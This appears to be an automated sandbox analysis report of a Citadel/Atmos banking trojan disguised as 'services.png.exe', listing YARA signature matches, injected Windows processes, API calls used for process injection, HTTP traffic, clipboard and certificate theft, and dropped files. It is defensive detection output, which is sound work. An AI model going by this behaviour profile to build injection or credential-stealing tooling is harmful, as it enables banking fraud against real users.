Source: 0000000F.00000003.1965679095.0000000000290000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 0000000F.00000003.1965679095.0000000000290000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 00000028.00000002.2974532793.0000000002390000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 00000028.00000002.2974532793.0000000002390000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 00000010.00000003.1981080900.0000000000580000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 00000010.00000003.1981080900.0000000000580000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 00000010.00000003.1981080900.0000000000580000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 00000007.00000003.1765021497.0000000000D40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 00000007.00000003.1765021497.0000000000D40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 00000007.00000003.1765021497.0000000000D40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 00000018.00000003.2075250679.0000000000FB0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 00000018.00000003.2075250679.0000000000FB0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 00000018.00000003.2075250679.0000000000FB0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 00000021.00000000.2113078053.0000000002E50000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 00000021.00000000.2113078053.0000000002E50000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 00000012.00000003.2000454832.0000000000900000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 00000012.00000003.2000454832.0000000000900000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 00000012.00000003.2000454832.0000000000900000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 00000011.00000003.1997224283.00000000003D0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 00000011.00000003.1997224283.00000000003D0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 00000011.00000003.1997224283.00000000003D0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 00000001.00000003.2627357615.00000000040FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 00000001.00000003.2627357615.00000000040FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 0000001B.00000003.2091183123.0000000000E20000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 0000001B.00000003.2091183123.0000000000E20000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 0000001B.00000003.2091183123.0000000000E20000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 00000027.00000000.2129746271.0000000002B30000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 00000027.00000000.2129746271.0000000002B30000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 0000001C.00000000.2091409743.0000000000810000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 0000001C.00000000.2091409743.0000000000810000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 0000001C.00000000.2091409743.0000000000810000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_

Source: C:\Users\user\Desktop\services.png.exe	Code function: 0_2_00426277 WriteProcessMemory,GetCurrentProcess,WriteProcessMemory,NtCreateThread,	0_2_00426277
Source: C:\Users\user\Desktop\services.png.exe	Code function: 0_2_00433EDE GetModuleHandleW,GetProcAddress,NtQueryInformationProcess,GetLogicalDriveStringsW,QueryDosDeviceW,lstrlenW,lstrlenW,lstrcpynW,lstrcpynW,lstrcpynW,	0_2_00433EDE
Source: C:\Users\user\Desktop\services.png.exe	Code function: 0_2_0041115F NtQueryKey,NtQueryKey,NtQueryKey,	0_2_0041115F
Source: C:\Users\user\Desktop\services.png.exe	Code function: 0_2_0040A328 NtQueryInformationProcess,CloseHandle,NtCreateThread,	0_2_0040A328
Source: C:\Users\user\Desktop\services.png.exe	Code function: 0_2_004263F3 NtCreateUserProcess,NtCreateThread,LdrLoadDll,ExitProcess,GetFileAttributesExW,CreateProcessAsUserA,CreateProcessAsUserW,HttpOpenRequestW,HttpOpenRequestA,HttpSendRequestW,HttpSendRequestA,HttpSendRequestExW,HttpSendRequestExA,HttpEndRequestA,HttpEndRequestW,InternetCloseHandle,InternetReadFile,InternetReadFileExA,InternetSetFilePointer,InternetQueryDataAvailable,HttpQueryInfoA,closesocket,send,WSASend,RegQueryValueExA,RegQueryValueExW,GetMessageW,PeekMessageW,GetClipboardData,PFXImportCertStore,	0_2_004263F3
Source: C:\Users\user\Desktop\services.png.exe	Code function: 0_2_0040A437 NtCreateUserProcess,GetProcessId,GetThreadContext,SetThreadContext,VirtualFreeEx,CloseHandle,	0_2_0040A437
Source: C:\Users\user\Desktop\services.png.exe	Code function: 0_2_02836277 WriteProcessMemory,GetCurrentProcess,WriteProcessMemory,NtCreateThread,	0_2_02836277
Source: C:\Users\user\Desktop\services.png.exe	Code function: 0_2_028363F3 NtCreateThread,ExitProcess,GetFileAttributesExW,CreateProcessAsUserA,CreateProcessAsUserW,HttpOpenRequestW,HttpOpenRequestA,HttpSendRequestW,HttpSendRequestA,HttpSendRequestExW,HttpSendRequestExA,HttpEndRequestA,HttpEndRequestW,InternetCloseHandle,InternetReadFile,InternetReadFileExA,InternetSetFilePointer,InternetQueryDataAvailable,HttpQueryInfoA,#3,#19,WSASend,RegQueryValueExA,RegQueryValueExW,GetMessageW,PeekMessageW,GetClipboardData,PFXImportCertStore,	0_2_028363F3
Source: C:\Users\user\Desktop\services.png.exe	Code function: 0_2_02843EDE GetModuleHandleW,GetProcAddress,NtQueryInformationProcess,GetLogicalDriveStringsW,QueryDosDeviceW,lstrlenW,lstrlenW,lstrcpynW,lstrcpynW,lstrcpynW,	0_2_02843EDE
Source: C:\Users\user\Desktop\services.png.exe	Code function: 0_2_0281A437 NtCreateUserProcess,GetProcessId,Wow64GetThreadContext,Wow64SetThreadContext,VirtualFreeEx,CloseHandle,	0_2_0281A437
Source: C:\Users\user\Desktop\services.png.exe	Code function: 0_2_0281A328 NtQueryInformationProcess,CloseHandle,NtCreateThread,	0_2_0281A328
Source: C:\Users\user\Desktop\services.png.exe	Code function: 0_2_0282115F NtQueryKey,NtQueryKey,NtQueryKey,	0_2_0282115F
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Code function: 1_2_00426277 WriteProcessMemory,GetCurrentProcess,WriteProcessMemory,NtCreateThread,	1_2_00426277
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Code function: 1_2_00433EDE GetModuleHandleW,GetProcAddress,NtQueryInformationProcess,GetLogicalDriveStringsW,QueryDosDeviceW,lstrlenW,lstrlenW,lstrcpynW,lstrcpynW,lstrcpynW,	1_2_00433EDE
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Code function: 1_2_0041115F NtQueryKey,NtQueryKey,NtQueryKey,	1_2_0041115F
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Code function: 1_2_0040A328 NtQueryInformationProcess,CloseHandle,NtCreateThread,	1_2_0040A328
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Code function: 1_2_004263F3 NtCreateUserProcess,NtCreateThread,LdrLoadDll,ExitProcess,GetFileAttributesExW,CreateProcessAsUserA,CreateProcessAsUserW,HttpOpenRequestW,HttpOpenRequestA,HttpSendRequestW,HttpSendRequestA,HttpSendRequestExW,HttpSendRequestExA,HttpEndRequestA,HttpEndRequestW,InternetCloseHandle,InternetReadFile,InternetReadFileExA,InternetSetFilePointer,InternetQueryDataAvailable,HttpQueryInfoA,closesocket,send,WSASend,RegQueryValueExA,RegQueryValueExW,GetMessageW,PeekMessageW,GetClipboardData,PFXImportCertStore,	1_2_004263F3
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Code function: 1_2_0040A437 NtCreateUserProcess,GetProcessId,GetThreadContext,SetThreadContext,VirtualFreeEx,CloseHandle,	1_2_0040A437
Source: C:\Windows\System32\sihost.exe	Code function: 2_2_000001CD438B28C8 NtEnumerateValueKey,NtEnumerateValueKey,	2_2_000001CD438B28C8
Source: C:\Windows\System32\ctfmon.exe	Code function: 5_2_000001F28B4E28C8 NtEnumerateValueKey,NtEnumerateValueKey,	5_2_000001F28B4E28C8
Source: C:\Windows\explorer.exe	Code function: 6_2_0907202C NtQuerySystemInformation,StrCmpNIW,	6_2_0907202C
Source: C:\Windows\explorer.exe	Code function: 6_2_090728C8 NtEnumerateValueKey,NtEnumerateValueKey,	6_2_090728C8
Source: C:\Windows\System32\ApplicationFrameHost.exe	Code function: 19_2_000001F6E81828C8 NtEnumerateValueKey,NtEnumerateValueKey,	19_2_000001F6E81828C8

Source: C:\Users\user\Desktop\services.png.exe

Code function: 0_2_0040A999 CreateProcessAsUserA,

0_2_0040A999

Source: C:\Users\user\Desktop\services.png.exe	Code function: 0_2_00420297 CreateThread,CreateMutexW,ExitWindowsEx,OpenEventW,CloseHandle,SetEvent,CloseHandle,CloseHandle,GetFileAttributesExW,Sleep,IsWellKnownSid,Sleep,GetFileAttributesExW,GetFileAttributesExW,GetFileAttributesExW,VirtualFree,CreateEventW,WaitForSingleObject,WaitForMultipleObjects,CloseHandle,CloseHandle,CloseHandle,CloseHandle,	0_2_00420297
Source: C:\Users\user\Desktop\services.png.exe	Code function: 0_2_00420003 ExitWindowsEx,	0_2_00420003
Source: C:\Users\user\Desktop\services.png.exe	Code function: 0_2_00417FF3 InitiateSystemShutdownExW,ExitWindowsEx,	0_2_00417FF3
Source: C:\Users\user\Desktop\services.png.exe	Code function: 0_2_02830297 CreateThread,CreateMutexW,ExitWindowsEx,OpenEventW,CloseHandle,SetEvent,CloseHandle,CloseHandle,GetFileAttributesExW,Sleep,IsWellKnownSid,Sleep,GetFileAttributesExW,GetFileAttributesExW,GetFileAttributesExW,VirtualFree,CreateEventW,WaitForSingleObject,WaitForMultipleObjects,CloseHandle,CloseHandle,CloseHandle,CloseHandle,	0_2_02830297
Source: C:\Users\user\Desktop\services.png.exe	Code function: 0_2_02830003 ExitWindowsEx,	0_2_02830003
Source: C:\Users\user\Desktop\services.png.exe	Code function: 0_2_02827FF3 InitiateSystemShutdownExW,ExitWindowsEx,	0_2_02827FF3
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Code function: 1_2_00420297 CreateThread,CreateMutexW,ExitWindowsEx,OpenEventW,CloseHandle,SetEvent,CloseHandle,CloseHandle,GetFileAttributesExW,Sleep,IsWellKnownSid,Sleep,GetFileAttributesExW,GetFileAttributesExW,GetFileAttributesExW,VirtualFree,CreateEventW,WaitForSingleObject,WaitForMultipleObjects,CloseHandle,CloseHandle,CloseHandle,CloseHandle,	1_2_00420297
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Code function: 1_2_00420003 ExitWindowsEx,	1_2_00420003
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Code function: 1_2_00417FF3 InitiateSystemShutdownExW,ExitWindowsEx,	1_2_00417FF3

Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe

Registry key value created / modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Privacy

Source: C:\Users\user\Desktop\services.png.exe	Code function: 0_2_00433259	0_2_00433259
Source: C:\Users\user\Desktop\services.png.exe	Code function: 0_2_00435A23	0_2_00435A23
Source: C:\Users\user\Desktop\services.png.exe	Code function: 0_2_0042946B	0_2_0042946B
Source: C:\Users\user\Desktop\services.png.exe	Code function: 0_2_0043CD43	0_2_0043CD43
Source: C:\Users\user\Desktop\services.png.exe	Code function: 0_2_004275AD	0_2_004275AD
Source: C:\Users\user\Desktop\services.png.exe	Code function: 0_2_0043C657	0_2_0043C657
Source: C:\Users\user\Desktop\services.png.exe	Code function: 0_2_00426772	0_2_00426772
Source: C:\Users\user\Desktop\services.png.exe	Code function: 0_2_02845A23	0_2_02845A23
Source: C:\Users\user\Desktop\services.png.exe	Code function: 0_2_02843259	0_2_02843259
Source: C:\Users\user\Desktop\services.png.exe	Code function: 0_2_0284C657	0_2_0284C657
Source: C:\Users\user\Desktop\services.png.exe	Code function: 0_2_02836772	0_2_02836772
Source: C:\Users\user\Desktop\services.png.exe	Code function: 0_2_0283946B	0_2_0283946B
Source: C:\Users\user\Desktop\services.png.exe	Code function: 0_2_028375AD	0_2_028375AD
Source: C:\Users\user\Desktop\services.png.exe	Code function: 0_2_0284CD43	0_2_0284CD43
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Code function: 1_2_0043C657	1_2_0043C657
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Code function: 1_2_00433259	1_2_00433259
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Code function: 1_2_00435A23	1_2_00435A23
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Code function: 1_2_0042946B	1_2_0042946B
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Code function: 1_2_0043CD43	1_2_0043CD43
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Code function: 1_2_004275AD	1_2_004275AD
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Code function: 1_2_00426772	1_2_00426772
Source: C:\Windows\System32\sihost.exe	Code function: 2_2_000001CD40E4D0E0	2_2_000001CD40E4D0E0
Source: C:\Windows\System32\sihost.exe	Code function: 2_2_000001CD40E538A8	2_2_000001CD40E538A8
Source: C:\Windows\System32\sihost.exe	Code function: 2_2_000001CD40E41F2C	2_2_000001CD40E41F2C
Source: C:\Windows\System32\sihost.exe	Code function: 2_2_000001CD438B2B2C	2_2_000001CD438B2B2C
Source: C:\Windows\System32\sihost.exe	Code function: 2_2_000001CD438BDCE0	2_2_000001CD438BDCE0
Source: C:\Windows\System32\sihost.exe	Code function: 2_2_000001CD438C44A8	2_2_000001CD438C44A8
Source: C:\Windows\System32\sihost.exe	Code function: 2_2_000001CD438E1F2C	2_2_000001CD438E1F2C
Source: C:\Windows\System32\sihost.exe	Code function: 2_2_000001CD438ED0E0	2_2_000001CD438ED0E0
Source: C:\Windows\System32\sihost.exe	Code function: 2_2_000001CD438F38A8	2_2_000001CD438F38A8
Source: C:\Windows\System32\svchost.exe	Code function: 3_2_00000151A6531F2C	3_2_00000151A6531F2C
Source: C:\Windows\System32\svchost.exe	Code function: 3_2_00000151A65438A8	3_2_00000151A65438A8
Source: C:\Windows\System32\svchost.exe	Code function: 3_2_00000151A653D0E0	3_2_00000151A653D0E0
Source: C:\Windows\System32\svchost.exe	Code function: 3_2_00000151A6562B2C	3_2_00000151A6562B2C
Source: C:\Windows\System32\svchost.exe	Code function: 3_2_00000151A65744A8	3_2_00000151A65744A8
Source: C:\Windows\System32\svchost.exe	Code function: 3_2_00000151A656DCE0	3_2_00000151A656DCE0
Source: C:\Windows\System32\svchost.exe	Code function: 4_2_0000019E29CF2B2C	4_2_0000019E29CF2B2C
Source: C:\Windows\System32\svchost.exe	Code function: 4_2_0000019E29D0AEC4	4_2_0000019E29D0AEC4
Source: C:\Windows\System32\svchost.exe	Code function: 4_2_0000019E29CFDCE0	4_2_0000019E29CFDCE0
Source: C:\Windows\System32\svchost.exe	Code function: 4_2_0000019E29D044A8	4_2_0000019E29D044A8
Source: C:\Windows\System32\ctfmon.exe	Code function: 5_2_000001F28B4B1F2C	5_2_000001F28B4B1F2C
Source: C:\Windows\System32\ctfmon.exe	Code function: 5_2_000001F28B4BD0E0	5_2_000001F28B4BD0E0
Source: C:\Windows\System32\ctfmon.exe	Code function: 5_2_000001F28B4C38A8	5_2_000001F28B4C38A8
Source: C:\Windows\System32\ctfmon.exe	Code function: 5_2_000001F28B4E2B2C	5_2_000001F28B4E2B2C
Source: C:\Windows\System32\ctfmon.exe	Code function: 5_2_000001F28B4EDCE0	5_2_000001F28B4EDCE0
Source: C:\Windows\System32\ctfmon.exe	Code function: 5_2_000001F28B4F44A8	5_2_000001F28B4F44A8
Source: C:\Windows\System32\ctfmon.exe	Code function: 5_2_000001F28B511F2C	5_2_000001F28B511F2C
Source: C:\Windows\System32\ctfmon.exe	Code function: 5_2_000001F28B51D0E0	5_2_000001F28B51D0E0
Source: C:\Windows\System32\ctfmon.exe	Code function: 5_2_000001F28B5238A8	5_2_000001F28B5238A8
Source: C:\Windows\System32\ctfmon.exe	Code function: 5_2_000001F28B542B2C	5_2_000001F28B542B2C
Source: C:\Windows\System32\ctfmon.exe	Code function: 5_2_000001F28B54DCE0	5_2_000001F28B54DCE0
Source: C:\Windows\System32\ctfmon.exe	Code function: 5_2_000001F28B5544A8	5_2_000001F28B5544A8
Source: C:\Windows\explorer.exe	Code function: 6_2_08D3D0E0	6_2_08D3D0E0
Source: C:\Windows\explorer.exe	Code function: 6_2_08D438A8	6_2_08D438A8
Source: C:\Windows\explorer.exe	Code function: 6_2_08D31F2C	6_2_08D31F2C
Source: C:\Windows\explorer.exe	Code function: 6_2_090844A8	6_2_090844A8
Source: C:\Windows\explorer.exe	Code function: 6_2_0907DCE0	6_2_0907DCE0
Source: C:\Windows\explorer.exe	Code function: 6_2_09072B2C	6_2_09072B2C
Source: C:\Windows\explorer.exe	Code function: 6_2_093D38A8	6_2_093D38A8
Source: C:\Windows\explorer.exe	Code function: 6_2_093CD0E0	6_2_093CD0E0
Source: C:\Windows\explorer.exe	Code function: 6_2_093C1F2C	6_2_093C1F2C
Source: C:\Windows\System32\svchost.exe	Code function: 7_2_00000221D5931F2C	7_2_00000221D5931F2C
Source: C:\Windows\System32\svchost.exe	Code function: 7_2_00000221D59438A8	7_2_00000221D59438A8
Source: C:\Windows\System32\svchost.exe	Code function: 7_2_00000221D593D0E0	7_2_00000221D593D0E0
Source: C:\Windows\System32\svchost.exe	Code function: 7_2_00000221D5962B2C	7_2_00000221D5962B2C
Source: C:\Windows\System32\svchost.exe	Code function: 7_2_00000221D59744A8	7_2_00000221D59744A8
Source: C:\Windows\System32\svchost.exe	Code function: 7_2_00000221D596DCE0	7_2_00000221D596DCE0
Source: C:\Windows\System32\RuntimeBroker.exe	Code function: 9_2_000001ECFC69DCE0	9_2_000001ECFC69DCE0
Source: C:\Windows\System32\RuntimeBroker.exe	Code function: 9_2_000001ECFC6A44A8	9_2_000001ECFC6A44A8
Source: C:\Windows\System32\RuntimeBroker.exe	Code function: 9_2_000001ECFC692B2C	9_2_000001ECFC692B2C
Source: C:\Windows\System32\RuntimeBroker.exe	Code function: 14_2_000001D1787544A8	14_2_000001D1787544A8
Source: C:\Windows\System32\RuntimeBroker.exe	Code function: 14_2_000001D17874DCE0	14_2_000001D17874DCE0
Source: C:\Windows\System32\RuntimeBroker.exe	Code function: 14_2_000001D178742B2C	14_2_000001D178742B2C
Source: C:\Windows\System32\RuntimeBroker.exe	Code function: 14_2_000001D1787B44A8	14_2_000001D1787B44A8
Source: C:\Windows\System32\RuntimeBroker.exe	Code function: 14_2_000001D1787ADCE0	14_2_000001D1787ADCE0
Source: C:\Windows\System32\RuntimeBroker.exe	Code function: 14_2_000001D1787A2B2C	14_2_000001D1787A2B2C
Source: C:\Windows\System32\RuntimeBroker.exe	Code function: 17_2_0000023B612144A8	17_2_0000023B612144A8
Source: C:\Windows\System32\RuntimeBroker.exe	Code function: 17_2_0000023B61202B2C	17_2_0000023B61202B2C
Source: C:\Windows\System32\RuntimeBroker.exe	Code function: 17_2_0000023B6120DCE0	17_2_0000023B6120DCE0
Source: C:\Windows\System32\RuntimeBroker.exe	Code function: 17_2_0000023B612744A8	17_2_0000023B612744A8
Source: C:\Windows\System32\RuntimeBroker.exe	Code function: 17_2_0000023B61262B2C	17_2_0000023B61262B2C
Source: C:\Windows\System32\RuntimeBroker.exe	Code function: 17_2_0000023B6126DCE0	17_2_0000023B6126DCE0
Source: C:\Windows\System32\RuntimeBroker.exe	Code function: 18_2_000002135E7B1F2C	18_2_000002135E7B1F2C
Source: C:\Windows\System32\RuntimeBroker.exe	Code function: 18_2_000002135E7C38A8	18_2_000002135E7C38A8
Source: C:\Windows\System32\RuntimeBroker.exe	Code function: 18_2_000002135E7BD0E0	18_2_000002135E7BD0E0
Source: C:\Windows\System32\RuntimeBroker.exe	Code function: 18_2_000002135E7E2B2C	18_2_000002135E7E2B2C
Source: C:\Windows\System32\RuntimeBroker.exe	Code function: 18_2_000002135E7F44A8	18_2_000002135E7F44A8
Source: C:\Windows\System32\RuntimeBroker.exe	Code function: 18_2_000002135E7EDCE0	18_2_000002135E7EDCE0
Source: C:\Windows\System32\ApplicationFrameHost.exe	Code function: 19_2_000001F6E81638A8	19_2_000001F6E81638A8
Source: C:\Windows\System32\ApplicationFrameHost.exe	Code function: 19_2_000001F6E815D0E0	19_2_000001F6E815D0E0
Source: C:\Windows\System32\ApplicationFrameHost.exe	Code function: 19_2_000001F6E8151F2C	19_2_000001F6E8151F2C
Source: C:\Windows\System32\ApplicationFrameHost.exe	Code function: 19_2_000001F6E81944A8	19_2_000001F6E81944A8
Source: C:\Windows\System32\ApplicationFrameHost.exe	Code function: 19_2_000001F6E818DCE0	19_2_000001F6E818DCE0
Source: C:\Windows\System32\ApplicationFrameHost.exe	Code function: 19_2_000001F6E8182B2C	19_2_000001F6E8182B2C
Source: C:\Windows\System32\ApplicationFrameHost.exe	Code function: 19_2_000001F6E84F38A8	19_2_000001F6E84F38A8
Source: C:\Windows\System32\ApplicationFrameHost.exe	Code function: 19_2_000001F6E84ED0E0	19_2_000001F6E84ED0E0
Source: C:\Windows\System32\ApplicationFrameHost.exe	Code function: 19_2_000001F6E84E1F2C	19_2_000001F6E84E1F2C

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\smbhost[1].exe F2B0F9D4F4109891D7A92F3C9E22C0FB748D36BF564EEBF74A0055056E307B45

Source: C:\Users\user\Desktop\services.png.exe

Process token adjusted: Security

Jump to behavior

Source: tmp3809.tmp.0.dr	Static PE information: Resource name: RT_MESSAGETABLE type: PDP-11 separate I&D executable not stripped
Source: tmp45F4.tmp.1.dr	Static PE information: Resource name: RT_MESSAGETABLE type: PDP-11 separate I&D executable not stripped

Source: tmp3809.tmp.0.dr	Static PE information: No import functions for PE file found
Source: tmp45F4.tmp.1.dr	Static PE information: No import functions for PE file found

Source: services.png.exe, 00000000.00000003.1694689173.00000000004D7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamekernel32j% vs services.png.exe
Source: services.png.exe, 00000000.00000003.1694689173.00000000004D7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \[FileVersionProductVersionFileDescriptionCompanyNameProductNameOriginalFilenameInternalNameLegalCopyright vs services.png.exe
Source: services.png.exe, 00000000.00000002.2171781778.0000000002BCF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCmd.Exe.MUIj% vs services.png.exe
Source: services.png.exe, 00000000.00000003.1699808293.000000000223F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedllhost.exej% vs services.png.exe

Source: services.png.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: services.png.exe, type: SAMPLE	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: dump.pcap, type: PCAP	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 41.0.XRdxSzSUL8yOL.exe.2c90000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 41.0.XRdxSzSUL8yOL.exe.2c90000.1.raw.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 39.0.XRdxSzSUL8yOL.exe.2b30000.1.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 39.0.XRdxSzSUL8yOL.exe.2b30000.1.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 33.0.XRdxSzSUL8yOL.exe.2e50000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 33.0.XRdxSzSUL8yOL.exe.2e50000.1.raw.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 22.3.SystemSettings.exe.f10000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 22.3.SystemSettings.exe.f10000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 22.3.SystemSettings.exe.f10000.0.raw.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 15.3.smartscreen.exe.290000.0.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 15.3.smartscreen.exe.290000.0.unpack, type: UNPACKEDPE	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
